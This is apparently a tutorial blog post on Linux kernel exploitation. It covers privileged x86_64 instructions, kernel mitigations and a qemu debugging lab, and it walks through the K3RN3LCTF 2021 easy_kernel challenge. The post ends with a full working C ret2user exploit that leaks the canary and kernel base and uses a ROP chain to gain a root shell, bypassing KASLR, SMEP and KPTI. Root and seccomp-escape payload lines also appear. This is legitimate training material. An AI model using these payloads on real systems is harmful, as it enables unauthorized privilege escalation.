Linux kernel is a layer between user applications and hardware. It manages things like CPU, memory, devices, file system, networking, process control and many other things. It’s a complex project with over 8 million lines of code and it’s still evolving. Such a dynamic project is an ideal research target.

Kernelspace vs Userspace exploitation (x86_64)

If you’re coming from userspace exploitation (like me) you may notice the following differences when writing kernel exploits.

More instructions

Instructions such as:

LGDT - Loads an address of a GDT into GDTR
LLDT - Loads an address of a LDT into LDTR
LTR - Loads a Task Register into TR
MOV Control Register - Copy data and store in Control Registers
LMSW - Load a new Machine Status WORD
CLTS - Clear Task Switch Flag in Control Register CR0
MOV Debug Register - Copy data and store in debug registers
INVD - Invalidate Cache without writeback
INVLPG - Invalidate TLB Entry
WBINVD - Invalidate Cache with writeback
HLT - Halt Processor
RDMSR - Read Model Specific Registers (MSR)
WRMSR - Write Model Specific Registers (MSR)
RDPMC - Read Performance Monitoring Counter
RDTSC - Read time Stamp Counter

With exceptions such as RDTSC which can also be run from userspace if TSD flag in register CR4 is not set.

More registers

When debugging the kernel with gdb we can see additional registers:

fs_base - base address of fs
gs_base - base address of gs
k_gs_base - stores the value of gs_base register while switching from userspace to kernelspace or vice versa
cr0 - control register
cr2 - control register
cr3 - control register
cr4 - control register
cr8 - control register
efer - Extended Feature Enable Register
mxcsr - control and status for SSE registers

What are the goals of exploitation?

The goal usually revolves around gaining higher privileges on the system or gaining persistence.

Some of the goals can be:

Get root

payload: commit_creds(prepare_kernel_cred(0))

Escape SECCOMP

payload: current->thread_info.flags &= ~(1 « TIF_SECCOMP)

Run single command

payload: run_cmd(“/path_to_command”)

Setup

Install prerequisites

sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev

Build the Linux kernel with debug symbols

git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
cd linux && make defconfig && make menuconfig
# Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
make -j$(nproc)

Build BusyBox

Download and decompress busybox (I chose the latest version at the time).

wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
tar xvf busybox-1.36.1.tar.bz2

Build it.

cd busybox-1.36.1
make defconfig
make menuconfig

In the Busybox Settings menu, select Build Options, and check the box next to Build BusyBox as a static binary (no shared libs). Next, specify the output folder.

make
make CONFIG_PREFIX=./../busybox_rootfs install

Build initramfs

Create a directory hierarchy for initramfs.

mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
cd initramfs/dev
sudo mknod sda b 8 0 
sudo mknod console c 5 1

Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:

#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys

/bin/mount -t devtmpfs devtmpfs /dev
chown 1337:1337 /tmp

setsid cttyhack setuidgid 1337 sh

exec /bin/sh

Make the script executable.

chmod +x init

Create initramfs itself.

find . -print0 | cpio --null -ov --format=newc > initramfs.cpio 
gzip ./initramfs.cpio

This will create initramfs.cpio.gz file which we will use as a filesystem for our qemu emulated Linux kernel.

Run with qemu

qemu-system-x86_64 \
    -m 512M \
    -nographic \
    -kernel bzImage \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
    -no-reboot \
    -cpu qemu64 \
    -smp 1 \
    -monitor /dev/null \
    -initrd initramfs.cpio.gz \
    -net nic,model=virtio \
    -net user \
    -gdb tcp::1234 \
    -S

Flag -gdb tcp::1234 sets gdbstub listener on port 1234. The -S flag halts the qemu execution until gdb debugger is connected.

Debugging

For debugging run the qemu instance with the -gdb and -S flag. Open gdb in another terminal and write:

target remote :1234

As for gdb extensions use which ever extension works, I use gef, although most of the things can be accomplished with plain gdb.

Shellcoding

If you know what you want to accomplish with code but don’t know how to do it on assembly level, write a kernel module, compile it and dump the assembly.

objdump -M intel -d test.ko

Kernel modules

Kernel modules are programs that can be loaded and unloaded into the kernel on the fly without the need to reboot the system. They are a great start for learning kernel exploitation as they run with kernel privileges.

To load a kernel module you can use:

sudo insmod <module_name.ko>

To unload a kernel module:

sudo rmmod <module_name>

To list currently loaded modules:

lsmod

All kernel modules have a struct called fops (file operations) which specifies which functions are called upon calling read, write, open, close or ioctl functions.

static struct file_operations module_fops =
{
    .owner   = THIS_MODULE,
    .read    = module_read,
    .write   = module_write,
    .open    = module_open,
    .release = module_close,
};

We can start auditing each of these functions in our search for bugs.

Mitigations

KASLR - randomizes base address of the kernel (same as userspace ASLR)
FG-KASLR - randomizes base address of every function
Kernel Stack Canary - value is placed on the stack before return address, this prevents some buffer overflow attacks (same as userspace)
SMEP - Supervisor Mode Execution Prevention prevents executing code stored in userspace from kernelspace
SMAP - Supervisor Mode Access Prevention prevents accessing memory from userspace while in kernelspace
KPTI - Kernel Page Tables Isolation is a mitigation against Meltdown CPU bug

More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map

Ret2user

Let’s take a look at the ret2user technique which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz

Vulnerability analysis

As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with vulnerable kernel module vuln.ko and we have source code in vuln.c.

Analyzing s_read function we notice a fixed size message buffer.

static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
{
    char message[40];

    strcpy(message, "Welcome to this kernel pwn series");

    if (raw_copy_to_user(ubuf, message, size) == 0) {
        printk(KERN_ALERT "%ld bytes read by device\n", size);
    }
    else {
        printk(KERN_ALERT "Some error occured in read\n");
    }

    return size;
}

If we read more than 40 chars from the message buffer we have a memory leak. This is useful for bypassing KASLR and Kernel Stack Canaries.

Analyzing s_write function we notice it’s similar but instead of reading we write values into the buffer.

static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
{
    char buffer[40];

    if (raw_copy_from_user(buffer, ubuf, size) == 0) {
        printk(KERN_ALERT "%ld bytes written to device\n", size);
    }
    else {
        printk(KERN_ALERT "Some error occured in write\n");
    }

    return size;
}

Calling this function and passing it more than 40 bytes we can trigger buffer overflow.

Exploitation

We have everything we need to start writing an exploit. Since this setup has no libc we can compile the binary statically and pack it into initramfs file system.

This is the plan for writing an exploit:

Leak Kernel Stack Canary
Leak kernel address to bypass KASLR
Save state for switching context between user-land and kernel-land (save registers for restoring them later)
Write ROP chain to bypass SMEP (Execution Prevention) and trigger buffer overflow
Get shell with system("/bin/sh")
Register SIGSEGV signal handler for KPTI bypass (otherwise the exploit Segfaults which is part of KPTI protection)

Below is an example of an exploit utilizing ret2user technique and bypassing KASLR, Kernel Stack Canary, SMEP, SMAP, KPTI:

#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>

void spawn_shell() {
    puts("[+] Returned to userland");

    if (getuid() == 0) system("/bin/sh");
    else puts("[-] Not root");
}

unsigned long user_cs, user_ss, user_rflags, user_rsp;
int main() {
    // KPTI bypass
    signal(SIGSEGV, spawn_shell);

    int fd = open("/proc/pwn_device", O_RDWR);
    if (fd < 0) {
        puts("[-] Failed to open device");
        exit(1);
    }
    puts("[+] Opened device");

    // Leak
    unsigned long buff[80] = {0};
    read(fd, buff, 64);

    unsigned long cookie = buff[5];
    unsigned long base = buff[7] - 0x25de2e;
    printf("[+] Leaked cookie: 0x%lx\n", cookie);
    printf("[+] Leaked base: 0x%lx\n", base);

    // Save state
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_rsp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );

    // Overflow
    unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
    int i = 5;
    payload[i] = cookie;
    ++i;
    payload[++i] = base + 0x001778; // pop rdi; ret; 
    payload[++i] = 0x0;
    payload[++i] = base + 0x08c340; // prepare_kernel_cred
    payload[++i] = base + 0x08bf00; // commit_creds
    payload[++i] = base + 0xc00f58; // swapgs; ret; 
    payload[++i] = base + 0x024952; // iretq; ret; 
    payload[++i] = (unsigned long)spawn_shell; // userland rip
    payload[++i] = user_cs;
    payload[++i] = user_rflags;
    payload[++i] = user_rsp;
    payload[++i] = user_ss;

    write(fd, payload, sizeof payload);

    return 0;
}